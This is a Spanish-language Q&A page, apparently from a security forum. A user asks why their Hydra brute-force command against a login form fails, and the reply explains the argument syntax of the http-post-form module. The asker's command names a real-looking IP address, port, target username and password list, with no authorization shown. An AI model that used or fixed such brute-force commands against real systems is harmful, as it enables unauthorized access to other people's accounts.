Mensaje de error de fuerza bruta de la hidra

Navega tus respuestas
0
hydra 190.13.132.90 -s 8081 -V -L /home/nicolas/Escritorio/USER -P /home/nicolas/Escritorio/passwords.txt http-post-form "/user=^USER^&password=^PASS^=Ingresar&culture=es-CL&mobile=0&clasica=1:F=Usuario inexistente:H=Cookie: stwa2={"lang":"es-CL"}"
Hydra v8.7-dev (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2018-04-29 14:34:51
[ERROR] the variables argument needs at least the strings ^USER^, ^PASS^, ^USER64^ or ^PASS64^: F=Usuario inexistente

¿Podría alguien escribir la cadena correcta para usar en la hidra por favor? Soy un noob usando hydra :)

El nombre de usuario es Gonzalo Sepulveda.

La URL completa del inicio de sesión es:

enlace

    
pregunta N1CR0N1X 30.04.2018 - 23:11
fuente

1 respuesta

3

El módulo http-post-form requiere tres argumentos separados por dos puntos, así: 

/login.php:username=^USER^&password=^PASS^:login failed

El "argumento de las variables" en el que se suministran los datos POST con los marcadores de posición de nombre de usuario y contraseña (que hice en negrita) es el argumento segundo . Pero usted dio los datos POST como el primer argumento que hace que Hydra piense que este es realmente el camino.

Entonces, con tu comando, Hydra piensa ... 

/user=^USER^&password=^PASS^=Ingresar&culture=es-CL&mobile=0&clasica=1

... es el camino y ... 

F=Usuario inexistente

son los parámetros POST, que no contienen ^USER^ o ^PASS^ y, por lo tanto, no son válidos.

    
respondido por el Arminius 01.05.2018 - 00:06
fuente

Lea otras preguntas en las etiquetas

¿Cuáles son mis opciones para almacenar una clave que desbloquea datos cifrados localmente en un dispositivo? ¿Es seguro obtener datos codificados html de la base de datos para evitar un ataque XSS almacenado?